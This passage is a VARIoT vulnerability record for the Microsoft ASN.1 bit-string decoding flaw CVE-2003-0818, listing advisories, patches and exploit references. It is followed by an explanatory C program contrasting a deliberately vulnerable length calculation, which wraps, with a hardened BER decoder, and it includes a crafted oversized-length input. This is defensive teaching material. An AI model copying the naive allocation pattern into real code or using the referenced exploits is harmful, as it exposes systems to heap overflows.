        "id": "JVNDB-2004-000037"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      }
    ],
    "trust": 4.14
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=153",
        "trust": 0.3,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#583108",
        "trust": 4.0
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818",
        "trust": 3.5
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324",
        "trust": 2.9
      },
      {
        "db": "USCERT",
        "id": "TA04-041A",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "13300",
        "trust": 1.2
      },
      {
        "db": "BID",
        "id": "9635",
        "trust": 1.1
      },
      {
        "db": "XF",
        "id": "15039",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "9633",
        "trust": 0.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "153",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "83044",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "32667",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "id": "VAR-200403-0051",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2024-08-14T12:57:20.421000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MS04-007",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx"
      },
      {
        "title": "MS04-007",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/nitishbadole/oscp-note-2 "
      },
      {
        "title": "OSCP",
        "trust": 0.1,
        "url": "https://github.com/H3n2yk/OSCP "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/rmsbpro/rmsbpro "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://www.kb.cert.org/vuls/id/583108"
      },
      {
        "trust": 2.5,
        "url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.kb.cert.org/vuls/id/216324"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=ntbugtraq\u0026m=107650972617367\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=107643892224825\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=107643836125615\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=ntbugtraq\u0026m=107650972723080\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653"
      },
      {
        "trust": 1.7,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms04-007.asp"
      },
      {
        "trust": 1.6,
        "url": "http://support.microsoft.com/default.aspx?scid=252648"
      },
      {
        "trust": 1.6,
        "url": "http://www.itu.int/itu-t/asn1/"
      },
      {
        "trust": 1.6,
        "url": "http://www.asn1.org/"
      },
      {
        "trust": 1.4,
        "url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html"
      },
      {
        "trust": 0.9,
        "url": "http://www.securityfocus.com/bid/13300"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp"
      },
      {
        "trust": 0.9,
        "url": "/archive/1/354227"
      },
      {
        "trust": 0.8,
        "url": "http://www.eeye.com/html/research/advisories/ad20040210.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ciac.org/ciac/bulletins/o-065.shtml"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818"
      },
      {
        "trust": 0.8,
        "url": "http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/15039"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/wr/2004/wr040701.txt"
      },
      {
        "trust": 0.8,
        "url": "http://www.jpcert.or.jp/at/2004/at040001.txt"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta04-041a/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta04-041a/"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/9635"
      },
      {
        "trust": 0.8,
        "url": "http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf"
      },
      {
        "trust": 0.8,
        "url": "http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.cyberpolice.go.jp/important/20040211_084159.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/"
      },
      {
        "trust": 0.3,
        "url": "http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/353320"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/153/"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms04_007_killbill"
      },
      {
        "trust": 0.1,
        "url": "http://metasploit.com/framework/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0818"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "date": "2004-03-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "date": "2005-04-21T00:00:00",
        "db": "BID",
        "id": "13300"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "BID",
        "id": "9633"
      },
      {
        "date": "2004-02-10T00:00:00",
        "db": "BID",
        "id": "9635"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "date": "2009-11-26T00:34:53",
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "date": "2004-02-11T02:24:00",
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "date": "2003-11-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "date": "2004-03-03T05:00:00",
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-02-10T00:00:00",
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "date": "2004-02-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "date": "2019-04-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "date": "2009-07-12T14:06:00",
        "db": "BID",
        "id": "13300"
      },
      {
        "date": "2009-07-12T02:06:00",
        "db": "BID",
        "id": "9633"
      },
      {
        "date": "2009-07-12T02:06:00",
        "db": "BID",
        "id": "9635"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "date": "2019-05-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "date": "2019-04-30T14:27:13.710000",
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft ASN.1 Library improperly decodes constructed bit strings",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.9
  }
}
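The record above names the two decoding flaws only in the abstract: an externally supplied BER length field that is trusted in a heap-size calculation, and constructed BIT STRINGs that nest further constructed BIT STRINGs. The C program below is an added illustration written for this page; it is not Microsoft's MSASN1 code and not any of the exploits referenced above. `naive_alloc_size` reproduces the bug class (a declared length of 0xFFFFFFFE added to a 6-octet header in 32-bit arithmetic wraps to 4, so a tiny block would be allocated while a later copy still used the huge length), while `ber_read_header` and `ber_bitstring_total` show the bounds, accumulator and depth checks that defeat it. All function names and the two sample encodings are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* One decoded BER identifier+length header (single-octet tags only). */
typedef struct {
    uint8_t  tag;          /* identifier octet */
    int      constructed;  /* bit 6 of the identifier octet */
    size_t   header_len;   /* octets consumed by identifier + length */
    uint32_t content_len;  /* declared length of the contents */
} ber_hdr;

/* Reads a definite-form length at buf[*pos]. Rejects the indefinite form
 * (0x80) and lengths wider than four octets. Does NOT compare the value
 * against the buffer; that is the caller's job. */
static int read_len(const uint8_t *buf, size_t n, size_t *pos, uint32_t *len)
{
    if (*pos >= n) return -1;
    uint8_t b = buf[(*pos)++];
    if (b < 0x80) { *len = b; return 0; }          /* short form */
    unsigned nbytes = b & 0x7f;
    if (nbytes == 0 || nbytes > 4) return -1;      /* indefinite or too wide */
    if (n - *pos < nbytes) return -1;              /* length octets truncated */
    uint32_t v = 0;
    for (unsigned i = 0; i < nbytes; i++) v = (v << 8) | buf[(*pos)++];
    *len = v;
    return 0;
}

/* Bug class (illustrative, not MSASN1's code): the declared length is trusted
 * and added to the header size in 32-bit arithmetic, so the result can wrap
 * to a small allocation while the huge length is still used for the copy. */
uint32_t naive_alloc_size(const uint8_t *buf, size_t n)
{
    size_t pos = 1;                                /* skip the tag octet */
    uint32_t len;
    if (n == 0 || read_len(buf, n, &pos, &len) != 0) return 0;
    return (uint32_t)pos + len;                    /* wraps: 6 + 0xFFFFFFFE == 4 */
}

/* Hardened header decode: contents must fit in what was received, so
 * header_len + content_len never exceeds n and cannot overflow. */
int ber_read_header(const uint8_t *buf, size_t n, ber_hdr *h)
{
    size_t pos = 0;
    uint32_t len;
    if (n == 0) return -1;
    h->tag = buf[pos++];
    if ((h->tag & 0x1f) == 0x1f) return -1;        /* multi-octet tag: out of scope */
    h->constructed = (h->tag & 0x20) != 0;
    if (read_len(buf, n, &pos, &len) != 0) return -1;
    if (len > n - pos) return -1;                  /* declared length exceeds input */
    h->header_len = pos;
    h->content_len = len;
    return 0;
}

/* Walks the contents of a constructed BIT STRING, which BER allows to hold
 * primitive and further constructed BIT STRING segments, summing the data
 * octets of the primitive segments (minus each one's unused-bits octet).
 * Nesting depth is bounded and every addition is checked before it happens. */
static int walk_bitstring(const uint8_t *buf, size_t n, int depth, size_t *total)
{
    if (depth > 8) return -1;                      /* refuse absurd nesting */
    size_t pos = 0;
    while (pos < n) {
        ber_hdr h;
        if (ber_read_header(buf + pos, n - pos, &h) != 0) return -1;
        if ((h.tag & 0x1f) != 0x03) return -1;     /* segments must be BIT STRING */
        const uint8_t *content = buf + pos + h.header_len;
        if (h.constructed) {
            if (walk_bitstring(content, h.content_len, depth + 1, total) != 0) return -1;
        } else {
            if (h.content_len == 0 || content[0] > 7) return -1; /* bad unused-bits octet */
            size_t data = h.content_len - 1;
            if (data > SIZE_MAX - *total) return -1; /* accumulator would wrap */
            *total += data;
        }
        pos += h.header_len + h.content_len;       /* <= n, guaranteed above */
    }
    return 0;
}

/* Decodes a top-level constructed BIT STRING TLV: returns the number of data
 * octets, or (size_t)-1 for any malformed or oversized encoding. */
size_t ber_bitstring_total(const uint8_t *buf, size_t n)
{
    ber_hdr h;
    size_t total = 0;
    if (ber_read_header(buf, n, &h) != 0 || h.tag != 0x23) return (size_t)-1;
    if (walk_bitstring(buf + h.header_len, h.content_len, 0, &total) != 0) return (size_t)-1;
    return total;
}

/* Constructed sample inputs (not captured traffic). */
const uint8_t kNested[] = {
    0x23, 0x0c,                               /* constructed BIT STRING, 12 octets */
      0x03, 0x03, 0x00, 0xaa, 0xbb,           /* primitive segment: 2 data octets */
      0x23, 0x05,                             /* nested constructed segment */
        0x03, 0x03, 0x00, 0xcc, 0xdd          /* primitive segment: 2 data octets */
};
const uint8_t kHostile[] = { 0x23, 0x84, 0xff, 0xff, 0xff, 0xfe }; /* length 0xFFFFFFFE */

int main(void)
{
    ber_hdr h;
    printf("nested: data octets = %zu\n", ber_bitstring_total(kNested, sizeof kNested));
    printf("hostile: naive alloc size = %u, hardened rc = %d\n",
           naive_alloc_size(kHostile, sizeof kHostile),
           ber_read_header(kHostile, sizeof kHostile, &h));
    return 0;
}
```

The hostile sample is just a header with no contents: a decoder that compares the declared length against the bytes actually received rejects it before any allocation, which is the check the naive path lacks. The same containment rule makes the per-segment arithmetic in `walk_bitstring` safe, because no segment can claim more than the remaining input, but the explicit accumulator check is kept so that the total cannot wrap even on platforms where `size_t` is 32 bits.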

